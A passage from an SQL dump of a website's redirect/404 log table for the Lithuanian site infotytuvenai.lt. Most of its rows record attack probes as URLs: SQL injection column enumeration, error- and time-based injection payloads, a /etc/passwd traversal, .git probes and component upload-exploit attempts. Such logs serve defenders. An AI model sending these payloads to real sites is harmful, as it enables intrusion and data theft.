00:00:00'),(5668,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL-- dAfv&view=article&id=305','','','',1,0,'2023-07-21 16:07:24','0000-00-00 00:00:00'),(5669,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL-- zBfs&view=article&id=305','','','',1,0,'2023-07-21 16:07:26','0000-00-00 00:00:00'),(5670,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL-- kRKO&view=article&id=305','','','',1,0,'2023-07-21 16:07:28','0000-00-00 00:00:00'),(5671,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL-- gRAt&view=article&id=305','','','',1,0,'2023-07-21 16:07:30','0000-00-00 00:00:00'),(5672,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- hnrw&view=article&id=305','','','',1,0,'2023-07-21 16:07:32','0000-00-00 00:00:00'),(5673,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- zevj&view=article&id=305','','','',1,0,'2023-07-21 16:07:34','0000-00-00 00:00:00'),(5674,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JfaQ&view=article&id=305','','','',1,0,'2023-07-21 16:07:35','0000-00-00 00:00:00'),(5675,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dPCo&view=article&id=305','','','',1,0,'2023-07-21 16:07:37','0000-00-00 00:00:00'),(5676,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hyWD&view=article&id=305','','','',1,0,'2023-07-21 16:07:39','0000-00-00 00:00:00'),(5677,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BNzg&view=article&id=305','','','',1,0,'2023-07-21 16:07:41','0000-00-00 00:00:00'),(5678,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' ORDER BY 1-- ozUf&view=article&id=305','','','',1,0,'2023-07-21 16:07:43','0000-00-00 00:00:00'),(5679,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL-- hUyL&view=article&id=305','','','',1,0,'2023-07-21 16:07:45','0000-00-00 00:00:00'),(5680,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL-- vaAq&view=article&id=305','','','',1,0,'2023-07-21 16:07:47','0000-00-00 00:00:00'),(5681,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL-- ECwV&view=article&id=305','','','',1,0,'2023-07-21 16:07:49','0000-00-00 00:00:00'),(5682,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL-- XlAD&view=article&id=305','','','',1,0,'2023-07-21 16:07:50','0000-00-00 00:00:00'),(5683,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- NUmu&view=article&id=305','','','',1,0,'2023-07-21 16:07:52','0000-00-00 00:00:00'),(5684,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- Qmoo&view=article&id=305','','','',1,0,'2023-07-21 16:07:54','0000-00-00 00:00:00'),(5685,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BTGX&view=article&id=305','','','',1,0,'2023-07-21 16:07:56','0000-00-00 00:00:00'),(5686,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- qeRp&view=article&id=305','','','',1,0,'2023-07-21 16:07:58','0000-00-00 00:00:00'),(5687,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- mmdb&view=article&id=305','','','',1,0,'2023-07-21 16:08:00','0000-00-00 00:00:00'),(5688,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- TzhS&view=article&id=305','','','',1,0,'2023-07-21 16:08:02','0000-00-00 00:00:00'),(5689,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- rmmQ&view=article&id=305','','','',1,0,'2023-07-21 16:08:03','0000-00-00 00:00:00'),(5690,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- wHXU&view=article&id=305','','','',1,0,'2023-07-21 16:08:05','0000-00-00 00:00:00'),(5691,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- dizq&view=article&id=305','','','',1,0,'2023-07-21 16:08:07','0000-00-00 00:00:00'),(5692,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- pvxg&view=article&id=305','','','',1,0,'2023-07-21 16:08:09','0000-00-00 00:00:00'),(5693,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- qbQO&view=article&id=305','','','',1,0,'2023-07-21 16:08:11','0000-00-00 00:00:00'),(5694,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- MPQH&view=article&id=305','','','',1,0,'2023-07-21 16:08:13','0000-00-00 00:00:00'),(5695,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- xvCR&view=article&id=305','','','',1,0,'2023-07-21 16:08:15','0000-00-00 00:00:00'),(5696,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UIbV&view=article&id=305','','','',1,0,'2023-07-21 16:08:16','0000-00-00 00:00:00'),(5697,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- xccj&view=article&id=305','','','',1,0,'2023-07-21 16:08:18','0000-00-00 00:00:00'),(5698,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XYiD&view=article&id=305','','','',1,0,'2023-07-21 16:08:20','0000-00-00 00:00:00'),(5699,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- frYd&view=article&id=305','','','',1,0,'2023-07-21 16:08:22','0000-00-00 00:00:00'),(5700,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1#&view=article&id=305','','','',1,0,'2023-07-21 16:08:24','0000-00-00 00:00:00'),(5701,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:26','0000-00-00 00:00:00'),(5702,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:27','0000-00-00 00:00:00'),(5703,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:29','0000-00-00 00:00:00'),(5704,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:31','0000-00-00 00:00:00'),(5705,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:33','0000-00-00 00:00:00'),(5706,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:35','0000-00-00 00:00:00'),(5707,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:37','0000-00-00 00:00:00'),(5708,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:38','0000-00-00 00:00:00'),(5709,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:40','0000-00-00 00:00:00'),(5710,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:08:42','0000-00-00 00:00:00'),(5711,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1#&view=article&id=305','','','',2,0,'2023-07-21 16:08:44','0000-00-00 00:00:00'),(5712,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:08:46','0000-00-00 00:00:00'),(5713,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:08:48','0000-00-00 00:00:00'),(5714,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:08:50','0000-00-00 00:00:00'),(5715,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:08:51','0000-00-00 00:00:00'),(5716,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:08:53','0000-00-00 00:00:00'),(5717,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:08:55','0000-00-00 00:00:00'),(5718,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:08:57','0000-00-00 00:00:00'),(5719,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:08:59','0000-00-00 00:00:00'),(5720,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:09:01','0000-00-00 00:00:00'),(5721,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',2,0,'2023-07-21 16:09:03','0000-00-00 00:00:00'),(5722,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') ORDER BY 1#&view=article&id=305','','','',1,0,'2023-07-21 16:09:05','0000-00-00 00:00:00'),(5723,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:07','0000-00-00 00:00:00'),(5724,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:08','0000-00-00 00:00:00'),(5725,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:10','0000-00-00 00:00:00'),(5726,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:12','0000-00-00 00:00:00'),(5727,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:14','0000-00-00 00:00:00'),(5728,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:16','0000-00-00 00:00:00'),(5729,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:18','0000-00-00 00:00:00'),(5730,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:20','0000-00-00 00:00:00'),(5731,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:22','0000-00-00 00:00:00'),(5732,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:24','0000-00-00 00:00:00'),(5733,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' ORDER BY 1#&view=article&id=305','','','',1,0,'2023-07-21 16:09:26','0000-00-00 00:00:00'),(5734,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:27','0000-00-00 00:00:00'),(5735,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:29','0000-00-00 00:00:00'),(5736,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:31','0000-00-00 00:00:00'),(5737,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:33','0000-00-00 00:00:00'),(5738,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:35','0000-00-00 00:00:00'),(5739,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:36','0000-00-00 00:00:00'),(5740,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:38','0000-00-00 00:00:00'),(5741,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:40','0000-00-00 00:00:00'),(5742,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:42','0000-00-00 00:00:00'),(5743,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:44','0000-00-00 00:00:00'),(5744,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' ORDER BY 1#&view=article&id=305','','','',1,0,'2023-07-21 16:09:46','0000-00-00 00:00:00'),(5745,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:48','0000-00-00 00:00:00'),(5746,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:49','0000-00-00 00:00:00'),(5747,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:51','0000-00-00 00:00:00'),(5748,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:53','0000-00-00 00:00:00'),(5749,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:55','0000-00-00 00:00:00'),(5750,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:57','0000-00-00 00:00:00'),(5751,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:09:58','0000-00-00 00:00:00'),(5752,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:10:00','0000-00-00 00:00:00'),(5753,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:10:02','0000-00-00 00:00:00'),(5754,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2023-07-21 16:10:04','0000-00-00 00:00:00'),(5755,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=6307','','','',1,0,'2023-07-21 16:12:47','0000-00-00 00:00:00'),(5756,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=9319','','','',1,0,'2023-07-21 16:12:48','0000-00-00 00:00:00'),(5757,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CASE WHEN (4001=7018) THEN 4001 ELSE 4001*(SELECT 4001 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))','','','',1,0,'2023-07-21 16:17:10','0000-00-00 00:00:00'),(5758,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CASE WHEN (7564=7564) THEN 7564 ELSE 7564*(SELECT 7564 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))','','','',1,0,'2023-07-21 16:17:11','0000-00-00 00:00:00'),(5759,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT 7728 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(7728=7728,1))),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)','','','',1,0,'2023-07-21 16:17:52','0000-00-00 00:00:00'),(5760,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CONCAT(0x717a6a6a71,(SELECT (ELT(6229=6229,1))),0x7162767071))','','','',1,0,'2023-07-21 16:17:53','0000-00-00 00:00:00'),(5761,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CHR(113)||CHR(122)||CHR(106)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (8816=8816) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113)))','','','',1,0,'2023-07-21 16:17:53','0000-00-00 00:00:00'),(5762,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5663=5663) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113))','','','',1,0,'2023-07-21 16:17:54','0000-00-00 00:00:00'),(5763,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos/favicon.ico','','','',1,0,'2023-08-04 09:46:07','0000-00-00 00:00:00'),(5764,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content\'nvOpzp; AND 1=1 OR (<\'\">iKO)),&view=article\'nvOpzp; AND 1=1 OR (<\'\">iKO)),&id=32\'nvOpzp; AND 1=1 OR (<\'\">iKO)),','','https://www.infotytuvenai.lt/index.php?option=com_content%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&view=article%27nvOpzp;%20AND%201=1%20OR%20(','',3,0,'2023-09-06 08:57:55','0000-00-00 00:00:00'),(5765,'https://www.infotytuvenai.lt/index.php/en/apie-centra/ekskursijos/favicon.ico','','','',2,0,'2023-09-08 14:21:29','0000-00-00 00:00:00'),(5766,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/.git/HEAD','','http://infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/.git/HEAD','',2,0,'2023-09-30 04:08:09','0000-00-00 00:00:00'),(5767,'https://www.infotytuvenai.lt/index.php/en/apie-centra/ekskursijos/media/mj/fbe7b2.js','','http://www.infotytuvenai.lt','',2,0,'2023-10-05 10:03:14','0000-00-00 00:00:00'),(5768,'https://www.infotytuvenai.lt/index.php/en/apie-centra/ekskursijos/media/mj/4a374f.js','','http://www.infotytuvenai.lt','',2,0,'2023-10-05 10:03:14','0000-00-00 00:00:00'),(5769,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/.git/HEAD','','http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/.git/HEAD','',2,0,'2023-10-11 01:32:57','0000-00-00 00:00:00'),(5770,'https://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/.git/HEAD','','http://infotytuvenai.lt/index.php/lt/apgyvendinimas/.git/HEAD','',3,0,'2023-10-11 01:34:24','0000-00-00 00:00:00'),(5771,'https://www.infotytuvenai.lt/index.php/lt/robots.txt','','','',34,0,'2023-10-12 09:11:16','0000-00-00 00:00:00'),(5772,'https://www.infotytuvenai.lt/index.php/lt/about/','','','',4,0,'2023-10-12 09:11:17','0000-00-00 00:00:00'),(5773,'https://infotytuvenai.lt/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image','','https://infotytuvenai.lt','',1,0,'2023-10-13 09:15:51','0000-00-00 00:00:00'),(5774,'https://infotytuvenai.lt/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image','','https://infotytuvenai.lt','',1,0,'2023-10-13 09:15:53','0000-00-00 00:00:00'),(5775,'https://infotytuvenai.lt/index.php/management/set_timezone','','https://infotytuvenai.lt/index.php/management/datetime','',1,0,'2023-10-13 09:23:23','0000-00-00 00:00:00'),(5776,'https://infotytuvenai.lt/','','','',1,0,'2023-10-13 09:23:26','0000-00-00 00:00:00'),(5777,'https://infotytuvenai.lt/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1','','','',1,0,'2023-10-13 09:35:29','0000-00-00 00:00:00'),(5778,'https://www.infotytuvenai.lt/index.php/en/15','','','',1,0,'2023-10-19 19:57:40','0000-00-00 00:00:00'),(5779,'https://infotytuvenai.lt/index.php/en/44-paskutinesnaujienos/368-konkursas','','','',4,0,'2023-11-03 05:18:16','0000-00-00 00:00:00'),(5780,'https://infotytuvenai.lt/index.php/lt/?option=(select*from(select(sleep(9)))a)','','https://www.google.com/','',1,0,'2023-11-03 15:36:43','0000-00-00 00:00:00'),(5781,'https://infotytuvenai.lt/index.php/lt/?option=0\'XOR(if(now()=sysdate(),sleep(9),0))XOR\'Z','','https://www.google.com/','',1,0,'2023-11-05 05:31:39','0000-00-00 00:00:00'),(5782,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1699375838.php','','','',1,0,'2023-11-07 17:39:56','0000-00-00 00:00:00'),(5783,'https://www.infotytuvenai.lt/index.php/lt/media/mj/2f13d8.js','','http://www.infotytuvenai.lt','',4,0,'2023-11-20 12:32:45','0000-00-00 00:00:00'),(5784,'https://www.infotytuvenai.lt/index.php/lt/media/mj/fbe7b2.js','','http://www.infotytuvenai.lt','',4,0,'2023-11-20 12:32:46','0000-00-00 00:00:00'),(5785,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos, naktinė ekskursija','','','',1,0,'2023-11-28 17:41:10','0000-00-00 00:00:00'),(5786,'https://infotytuvenai.lt/index.php/lt/zlib/inflate','','','',9,0,'2023-12-08 02:58:34','0000-00-00 00:00:00'),(5787,'https://infotytuvenai.lt/index.php/lt/inffast','','','',9,0,'2023-12-08 02:58:34','0000-00-00 00:00:00'),(5788,'https://infotytuvenai.lt/index.php/lt/trees','','','',9,0,'2023-12-08 02:58:35','0000-00-00 00:00:00'),(5789,'https://infotytuvenai.lt/index.php/lt/crc32','','','',9,0,'2023-12-08 02:58:36','0000-00-00 00:00:00'),(5790,'https://infotytuvenai.lt/index.php/lt/common','','','',14,0,'2023-12-08 02:58:37','0000-00-00 00:00:00'),(5791,'https://infotytuvenai.lt/index.php/lt/adler32','','','',11,0,'2023-12-08 02:58:37','0000-00-00 00:00:00'),(5792,'https://infotytuvenai.lt/index.php/lt/messages','','','',13,0,'2023-12-08 02:58:38','0000-00-00 00:00:00'),(5793,'https://infotytuvenai.lt/index.php/lt/inftrees','','','',9,0,'2023-12-08 02:58:39','0000-00-00 00:00:00'),(5794,'https://infotytuvenai.lt/index.php/lt/lib/inflate','','','',9,0,'2023-12-08 02:58:41','0000-00-00 00:00:00'),(5795,'https://infotytuvenai.lt/index.php/lt/lib/deflate','','','',9,0,'2023-12-08 02:58:42','0000-00-00 00:00:00'),(5796,'https://infotytuvenai.lt/index.php/lt/utils/common','','','',19,0,'2023-12-08 02:58:42','0000-00-00 00:00:00'),(5797,'https://infotytuvenai.lt/index.php/lt/zlib/deflate','','','',10,0,'2023-12-08 02:58:44','0000-00-00 00:00:00'),(5798,'https://infotytuvenai.lt/index.php/lt/zlib/zstream','','','',10,0,'2023-12-08 02:58:46','0000-00-00 00:00:00'),(5799,'https://infotytuvenai.lt/index.php/lt/zlib/gzheader','','','',10,0,'2023-12-08 02:58:46','0000-00-00 00:00:00'),(5800,'https://infotytuvenai.lt/index.php/lt/zlib/messages','','','',10,0,'2023-12-08 02:58:47','0000-00-00 00:00:00'),(5801,'https://infotytuvenai.lt/index.php/lt/utils/strings','','','',11,0,'2023-12-08 02:58:48','0000-00-00 00:00:00'),(5802,'https://infotytuvenai.lt/index.php/lt/zlib/constants','','','',11,0,'2023-12-08 02:58:50','0000-00-00 00:00:00'),(5803,'https://infotytuvenai.lt/index.php/lt/lib/utils/common','','','',10,0,'2023-12-08 02:58:50','0000-00-00 00:00:00'),(5804,'https://infotytuvenai.lt/index.php/lt/lib/zlib/constants','','','',9,0,'2023-12-08 02:58:51','0000-00-00 00:00:00'),(5805,'https://www.infotytuvenai.lt/index.php/lt/zlib/inflate','','','',16,0,'2023-12-08 03:04:52','0000-00-00 00:00:00'),(5806,'https://www.infotytuvenai.lt/index.php/lt/trees','','','',9,0,'2023-12-08 03:04:53','0000-00-00 00:00:00'),(5807,'https://www.infotytuvenai.lt/index.php/lt/crc32','','','',17,0,'2023-12-08 03:04:53','0000-00-00 00:00:00'),(5808,'https://www.infotytuvenai.lt/index.php/lt/common','','','',13,0,'2023-12-08 03:04:54','0000-00-00 00:00:00'),(5809,'https://www.infotytuvenai.lt/index.php/lt/adler32','','','',18,0,'2023-12-08 03:04:55','0000-00-00 00:00:00'),(5810,'https://www.infotytuvenai.lt/index.php/lt/inffast','','','',9,0,'2023-12-08 03:04:55','0000-00-00 00:00:00'),(5811,'https://www.infotytuvenai.lt/index.php/lt/messages','','','',9,0,'2023-12-08 03:04:56','0000-00-00 00:00:00'),(5812,'https://www.infotytuvenai.lt/index.php/lt/inftrees','','','',29,0,'2023-12-08 03:04:56','0000-00-00 00:00:00'),(5813,'https://www.infotytuvenai.lt/index.php/lt/lib/deflate','','','',10,0,'2023-12-08 03:04:58','0000-00-00 00:00:00'),(5814,'https://www.infotytuvenai.lt/index.php/lt/lib/inflate','','','',52,0,'2023-12-08 03:04:58','0000-00-00 